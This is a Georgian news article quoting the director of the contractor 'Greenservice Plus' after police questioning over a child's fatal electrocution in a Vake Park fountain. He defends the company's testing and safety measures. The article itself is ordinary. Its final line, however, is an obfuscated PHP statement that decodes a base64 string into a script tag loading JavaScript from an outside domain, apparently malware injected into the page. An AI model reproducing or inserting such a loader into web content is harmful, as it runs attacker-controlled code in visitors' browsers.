celsiusi
ავერსი შნაიდერი
მთავარი კითხვები იყო შესრულებული სამუშაოს შესახებ და უბედური შემთხვევის შესახებ, – ამის შესახებ „გრინსერვის პლუსის“ დირექტორმა ლაშა ფურცხვანიძემ ვაკის პარკში მომხდარ ტრაგიკულ შემთხვევასთან დაკავშირებით გამოკითხვის დასრულების შემდეგ ჟურნალისტებს განუცხადა.
 
ფურცხანიძის თქმით, საქართველოში ჩამოტანამდე აპარატურამ ტესტირება გაიარა და შესაბამისი რეპორტებიც არსებობს.
 
ამასთან, ფურცხვანიძის თქმით, მომხდარი შემთხვევა წინასწარ განსაზღვრულ ქმედებას ჰგავს.
 
„პასუხისმგებელი ვართ იმ სამუშაოებზე, რაც ჩავატარეთ, სამუშაოები ყველა ნორმის დაცვით არის ჩატარებული, ყველა საბუთი არსებობს, ეს ნახეს უკვე პოლიციაში და გამოძიება დაადგენს. სანამ ჩამოვიდოდა ეს აპარატურა საქართველოში, შემოწმებული იყო ამის ტესტირება და რეპორტები არსებობს, დევს ესეც პოლიციაში. ძალიან არ მინდა ვთქვა, ერთადერთ რაღაცას, წინასწარ განსაზღვრულ ქმედებას ჰგავს, სხვას მე ვერაფერს ვიტყვი, ამას უკვე გამოძიება დაადგენს. ჩვენი თანამშრომლები წინა დღესაც მუშაობდნენ, სამი საათი მუშაობდნენ, ჩართულ აუზში ამოწმებდნენ და ასწორებდნენ. მეტსაც გეტყვით, ძაღლი ჩახტა სამჯერ, კადრებიც არის ჩვენ ორი თვის განმავლობაში ტესტირების რეჟიმში გვქონდა ვამუშავებდით და არანაირი დარღვევა არ დაფიქსირებულა, მე ერთ შემთხვევას თუ მეტყვით, როდესაც აუზში ჩასულ ვინმეს დენმა დაარტყა, მაშინ მეც დავფიქრდები, მაგრამ მიშას დროიდან, როდესაც შადრევნები კეთდებოდა, არცერთი ასეთი ფაქტი არ დაფიქსირებულა, თუ არ ჩავთვლით ვაი ჟურნალისტების და ვაი პოლიტიკოსების განცხადებას, რომ თურმე ვიღაცამ დაიძახა რომ მანდ დენია, შეუძლია გამოძიებას მარტივად თუ არამარტივად დაადგინოს, მე ვერ ვიტყვით. გამოძიებას თუ დასჭირდა რა თქმა უნდა, მოვალ და ვითანამშრომლებ. იმაზე მეტ სასჯელს მე ვერავინ მომისჯის ვიდრე, რაც უკვე ღმერთმა მთელი სიცოცხლის ბოლომდე სატარებლად უკვე მომისაჯა, მე თავს დამნაშავედ არ ვგრძნობ, მაგრამ ის პატარა უმწიკვლო არსება, რომელიც გარდაიცვალა სიცოცხლის ბოლომდე იქნება ჩემს სასჯელად. მანამდე ყველაფერი მწყობრში იყო, ძალიან ბევრი დამთხვევაა და ძალიან ბევრი რამ ასე არ ხდება. გვქონდა დაყენებული, ტესტირების რეპორტი არსებობს, მე გეტყვით რომ ჩემი თვალით მაქვს ნანახი პირადად გაჟონვის ღელე ასე ჰქვია, რომელიც თანხაში გეტყვით და მიხვდებით ღირს 300 ლარი, და არცერთი თავმოყვარე კომპანია კი არა, ბოლო კომპანია არ გააკეთებს იმას, რომ შადრევანში, რომელშიც დენია, არ დააყენოს გაჟონვის ღელე. ძალიან მაინტერესებს ექსპერტიზამ დაადგინოს რა მოხდა, ისეთი რამ მანამდე არ მომხდარა ბოლო რა ვიცი რამდენი წლის განმავლობაში, ნუ ჩემი გადმოსახედიდან 25 წლის განმავლობაში არასოდეს მომხდარა, არაერთი შადრევანი გაგვიკეთებია და ასეთი რამ არ მომხდარა“, – განაცხადა ფურცხავნიძემ.
613
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");